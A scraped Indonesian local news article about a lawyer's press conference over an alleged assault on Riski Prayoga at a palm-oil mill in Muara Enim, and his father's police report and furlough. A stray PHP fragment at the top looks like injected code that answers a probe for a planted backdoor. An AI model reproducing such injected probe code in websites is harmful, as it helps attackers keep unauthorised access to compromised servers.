error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Robal Asnadi Mengadukan H alias D Ke Polisi Di Duga Melakukan Penganiayaan Pada Riski Prayoga - SMI.COM

Home / PRABUMULIH

Kamis, 17 Maret 2022 - 18:02 WIB

Robal Asnadi Mengadukan H alias D Ke Polisi Di Duga Melakukan Penganiayaan Pada Riski Prayoga

PRABUMULIH, SMI-

Menindaklanjuti adanya dugaan penganiayaan oleh H alias D, terhadap klien bapak Usman Firiansyah.SH sang Advokat senior kondang di wilayah kota Prabumulih dan kabupaten Muara Enim.

Pada hari Jum’at 18/02/2022 sekitar pukul 11.00 WIB, di lingkungan PKS Sungai Niru KSO PT.Srirejeki Putra Mandiri dengan PTPN VII.

Dalam peristiwa tersebut diduga ada tindakan pengeroyokan dan pengrusakan seharusnya menurut klien saya bahkan hal tersebut tidak benar dengan banyak saksi-saksi, di dukung pula adanya rekaman CCTV dan kliennya sudah berobat ke RS Fadillah kota Prabumulih.

Dengan kejadian itu, membuat kliennya Usman Firiansyah.SH merasa di rugikan.
Hal ini disampaikan oleh sang penasehat hukum Riski Prayoga, yaitu bapak Usman Firiansyah.SH dalam kegiatan konferensi persnya.

Kepada beberapa orang jurnalis elektronik online dan cetak,sang pengacara ini menceritakan keberatan kliennya.

“Keluarga korban yang merupakan ayah dari Riski Prayoga yaitu bapak Robal, akibat adanya permasalahan antara H alias D dengan Riski Prayoga.

Saat ini berdampak pada karier pak Robal yang sekarang di rumahkan, akibat adanya permasalahan antara H alias D dengan Riski Prayoga”,ujar Usman Firiansyah.SH.

Baca Juga :  AKBP.Witdiardi.SIk.MH Pimpin Press-Release Tersangka Pembunuhan Almarhum S Alias Y Tukang Ojek Kota Prabumulih

Lebih lanjut sang pengacara menuturkan kepada para awak media.”Pak Robal yang sekarang sedang dirumahkan, sedangkan pada fakta sebenarnya beliau tidak pernah ikut melakukan penganiayaan seperti yang di sangkakan padanya.jadi saat ini kami akan meminta agar pihak terkait untuk memperhatikan keadaan klien kita yang terdzholimi ini.lebih ironisnya lagi pihak perusahaan dimana tempat pak robal bekerja, mendapatkan tekanan dari salah seorang oknum masyarakat.yangmana oknum tersebut meminta agar pihak perusahaan memberhentikan pak Robal.”, ungkap Usman firiansyah.SH yang merupakan Advokat senior dan kondang di provinsi Sumatera Selatan ini, yang mana beliau juga merupakan aktivis di era reformasi tahun 1998.

Kegiatan acara konferensi pers di lakukan pada Selasa Malam 16/03/2022. Menurut informasi yang diterima dari Usman Firiansyah.SH,kasus ini sudah di laporkan ke pihak kepolisian sektor Rambang Dangku.
Hal ini di buktikan dengan surat tanda laporan kepolisian, dengan nomor LP :STTPL/37/lll/2021/Sumsel/Res Muara Enim/sek RB Dangku tanggal 12/03/2022.
Sebagai saksi pelapor oleh bapak Robal Asnadi.

Baca Juga :  Pelantikan Kepala Desa Terpilih Di Kabupaten Muara Enim Periode 2021-2027 Sukses

Yang mana dalam LP tersebut tertulis,dalam hal ini bapak Robal sebagai saksi pelapor dan Riski sebagai saksi korban. Bahwa hari Jum’at 18/02/2022 sekitar pukul 11.15 WIB. Telah terjadi tindak penganiayaan yang dilakukan oleh H alias D,di dalam areal pabrik sawit PTPN VII, desa Jemenang, kecamatan Rambang Niru, kabupaten Muara Enim, provinsi Sumatera Selatan. Yang di tanda tangani oleh KA SPK polsek Rambang Dangku Ardiansyah,pada tanggal 12/03/2022.

Sementara pihak perusahaan menanggapi konfrensi pers ini, kepada awak media ini memberikan keterangan.

“kami dari perusahaan, membenarkan bahwa bapak Robal untuk sementara ini dirumahkan.hal ini perlu dilakukan dengan pertimbangan dan antisipasi terhadap oknum masyarakat, yang akan melakukan aksi-aksi yang dapat merugikan semua pihak”, ungkap lmam Syaputra Selaku Mill Manager di perusahaan dimana tempat Robal Asnadi bekerja.

(Sunar)

Share :

Baca Juga

PRABUMULIH

AKBP.Witdiardi.SIk.MH Kapolres Prabumulih Lakukan Curhat Jum’at di Mesjid Al Muhajirin Pangkul

PRABUMULIH

Pelantikan Pengurus DPD Dan DPC Se-kota Prabumulih Serta Rapat Kerja Daerah (RAKERDA) DPD PAN Kota Prabumulih

MUARA ENIM

Bentuk Kepedulian, PT MHP Ikut Perbaiki Jalan

PRABUMULIH

Rayakan HUT 20 Tahun Desa Sinar Rambang Adakan Tournament Volly Ball Semi Open

PRABUMULIH

Winro, Air Mineral Murah Tetapi Tidak Murahan

PRABUMULIH

Polsek Prabumulih Barat Bubarkan Acara Organ Tunggal di Malam Hari

PRABUMULIH

Giat Menyambut Ramadhan 1443 H Rutan Prabumulih lakukan Pembersihan Masjid/Musholla

PRABUMULIH

AKBP.Witdiardi.SIk.MH Kapolres Prabumulih Kunjungi Sekolah TK Kemala Bhayangkari Kota Prabumulih